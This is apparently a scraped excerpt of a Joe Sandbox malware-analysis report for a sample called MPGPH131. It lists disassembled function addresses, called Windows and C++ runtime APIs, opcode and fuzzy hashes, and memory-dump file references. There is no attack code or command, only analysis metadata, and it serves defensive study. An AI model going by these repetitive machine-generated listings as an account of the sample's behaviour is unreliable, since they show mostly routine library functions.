Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
Instruction ID: 39eb036681f86293bb6c5fd4e4a559f652a5300d4aef237bdd20c7516cc80769
Opcode Fuzzy Hash: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
Instruction Fuzzy Hash: 1E41D372A011049BCB15EF68DD806AEBBE5EF45311B6402B9F814EB251D730EE51DBD2

Function 00BA1832 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00BA1719,00000000,CF830579,00BDFCB8,0000000C,00BA17D5,00B958DD,?), ref: 00BA1888

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 942d4728a3dec9e920f058ae75b6e18efaf17d7f21c585f3ef03cbfb3fa01d64
Instruction ID: 0be7e87111cf3c9c85edf8a05f7e4d46f18e0f59620948cc2165317545216ed5
Opcode Fuzzy Hash: 942d4728a3dec9e920f058ae75b6e18efaf17d7f21c585f3ef03cbfb3fa01d64
Instruction Fuzzy Hash: 7D116B3365C12025D765227C6C4677E2BC9CF83774F3909D9F8159B1D2EF2D9C424245

Function 00B9AD7C Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00BDF970,00B8B2D2,00000002,00B8B2D2,00000000,?,?,?,00B9AE86,00000000,?,00B8B2D2,00000002,00BDF970), ref: 00B9ADB8

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 5de8d3ee48d202388e21580272e48509900c661970e352824e4209deb13f0faa
Instruction ID: 27bd91bcc3bc90e6412a60d850fab847c8c59a191724f81e69ecb4461b885105
Opcode Fuzzy Hash: 5de8d3ee48d202388e21580272e48509900c661970e352824e4209deb13f0faa
Instruction Fuzzy Hash: 4E012B326141456FCF098F58DC49D9E3BA9DF81330F3501A8F8119B2E0EA71DD418BD0

Function 00B8BFB1 Relevance: 1.6, APIs: 1, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00AB1FDE

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: d13312a40ae0aba2800e1300753dba95f17646a2421c4c07496071a155334446
Instruction ID: 085eb2663a62a95208150d570014491e8bcc18c5cf6109b73a553c9e1f129c28
Opcode Fuzzy Hash: d13312a40ae0aba2800e1300753dba95f17646a2421c4c07496071a155334446
Instruction Fuzzy Hash: D001FE3640420D77CB14FBB4EC01D99B7ECDE11360B5085B6FA149A5A1FBB0E590C7D5

Function 00BA3113 Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,00B8A41C,?,?,00BA2A99,00000001,00000364,?,00000006,000000FF,?,00B8D39B,?,?,?,?), ref: 00BA3155

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 574364ca675131a036ac81d17e2907d6a1bfcaaeb8f53c619f3a9c9ddc3773fb
Instruction ID: 3c0eec96febdbc4c2cf5f99440b824d33a1ec3e58f4ab83a55781115bece6f33
Opcode Fuzzy Hash: 574364ca675131a036ac81d17e2907d6a1bfcaaeb8f53c619f3a9c9ddc3773fb
Instruction Fuzzy Hash: 14F0E93160D728669B616B6A8C41B5B77C9DF43FB0F1580E1BC18BA180CB30EA4041E0

Function 00BA3B4D Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00B8D39B,?,?,?,?,?,00AB2D8D,00B8A41C,?,?,00B8A41C), ref: 00BA3B80

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 62f86ca7a72307a1a6d146e253e7ca1c9bd58037cc3e1071884428e9ff753618
Instruction ID: f14498b95850780c8b055871d4e44cf7fdb5e6b03e24c9fa8a5a95d9e3e4cf4d
Opcode Fuzzy Hash: 62f86ca7a72307a1a6d146e253e7ca1c9bd58037cc3e1071884428e9ff753618
Instruction Fuzzy Hash: 06E0ED3150D320A6EA2036298C80B6B66CBCB87BB0F9506E4BC189A181DB60CE0081B1

Non-executed Functions

Function 00B1A120 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B1A143
std::_Lockit::_Lockit.LIBCPMT ref: 00B1A165
std::_Lockit::~_Lockit.LIBCPMT ref: 00B1A185
std::_Lockit::~_Lockit.LIBCPMT ref: 00B1A1AF
std::_Lockit::_Lockit.LIBCPMT ref: 00B1A21D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00B1A269
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00B1A283
std::_Lockit::~_Lockit.LIBCPMT ref: 00B1A318
std::_Facet_Register.LIBCPMT ref: 00B1A325

Strings

bad locale name, xrefs: 00B1A33F

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: 7c73dfb67b9350a1d9440c59c08f9e27c15b2e6d5a2ec30447569bd7165b136d
Instruction ID: 1c31f9b67f7353acd85aa191f0651b1bba2dfc16eb672bb90e8a8894736f2356
Opcode Fuzzy Hash: 7c73dfb67b9350a1d9440c59c08f9e27c15b2e6d5a2ec30447569bd7165b136d
Instruction Fuzzy Hash: A4616DB1D01248ABEF11DFA4D885BDEBBF4AF15310F5440A9E804AB351EB74E945CB92

Function 00AB3770 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00AB37E9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AB3835
__Getctype.LIBCPMT ref: 00AB384E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00AB386A
std::_Lockit::~_Lockit.LIBCPMT ref: 00AB38FF

Strings

bad locale name, xrefs: 00AB391C

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1840309910-1405518554
Opcode ID: 7c5026ce55ebd24fdb4a84e4a177c61004b189f5fe22b144e5cd2ec10522e956
Instruction ID: 5a568cb7bf7b580ca51d0cbdf8568b1f8e2f7a44432782997672ef72e0d77e5c
Opcode Fuzzy Hash: 7c5026ce55ebd24fdb4a84e4a177c61004b189f5fe22b144e5cd2ec10522e956
Instruction Fuzzy Hash: 1B5130B2D002489BEF10DFE4D845BDEFBF8AF14710F144169E815AB342E775AA45CB92

Function 00B8FB30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00B8FB67
___except_validate_context_record.LIBVCRUNTIME ref: 00B8FB6F
_ValidateLocalCookies.LIBCMT ref: 00B8FBF8
__IsNonwritableInCurrentImage.LIBCMT ref: 00B8FC23
_ValidateLocalCookies.LIBCMT ref: 00B8FC78

Strings

csm, xrefs: 00B8FC0D

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: d20dd6ea4abd7519c5fa889bb64a10410c79e7159f8a2c26ba46cbc97ba97a7b
Instruction ID: 97d3bd18c6fa46e2b6ccbb7ea36dc0064968b37612fa2f3397dd5299d65e515c
Opcode Fuzzy Hash: d20dd6ea4abd7519c5fa889bb64a10410c79e7159f8a2c26ba46cbc97ba97a7b
Instruction Fuzzy Hash: 76418630A002099BCF10FF68C895AAEBBF5EF45324F1481E5EC149B3A2D771EA55CB91

Function 00B188E0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B18903
std::_Lockit::_Lockit.LIBCPMT ref: 00B18926
std::_Lockit::~_Lockit.LIBCPMT ref: 00B18946
std::_Facet_Register.LIBCPMT ref: 00B189BB
std::_Lockit::~_Lockit.LIBCPMT ref: 00B189D3
Concurrency::cancel_current_task.LIBCPMT ref: 00B189EB

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 36622bbff23c417db79e5455106890e21b916cb544cef1d5dd4a1b1d8b2e337c
Instruction ID: 9fef14cf03083a510d955d48e3857d8c0d7c5daea8cab51a04fc35088b44c229
Opcode Fuzzy Hash: 36622bbff23c417db79e5455106890e21b916cb544cef1d5dd4a1b1d8b2e337c
Instruction Fuzzy Hash: 2A41E271900259DFCF10DF54D881AAEBBF5FB05360F5442AAE915AB361DB30AE80CBD2

Function 00AB5DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 424COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00AB60F2
___std_exception_destroy.LIBVCRUNTIME ref: 00AB617F
___std_exception_copy.LIBVCRUNTIME ref: 00AB6248

Strings

recursive_directory_iterator::operator++, xrefs: 00AB61CC

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: recursive_directory_iterator::operator++
API String ID: 1206660477-953255998
Opcode ID: 835b01908be9d61120e91b30b96a91f5e75459aee68c2b44e49f0b4680c020b9
Instruction ID: ccefc026624453d60dbb2275f385abe3c79396f4e2f129c8c863f68e62bd4c88
Opcode Fuzzy Hash: 835b01908be9d61120e91b30b96a91f5e75459aee68c2b44e49f0b4680c020b9
Instruction Fuzzy Hash: 3BE1F0B19006049FDB28DF68D845BAEFBF9FF44300F14866DE41693792D774AA44CBA1

Function 00AB84C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00AB86DE
___std_exception_destroy.LIBVCRUNTIME ref: 00AB86ED

Strings

, column , xrefs: 00AB8555, 00AB856B
at line , xrefs: 00AB8518

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
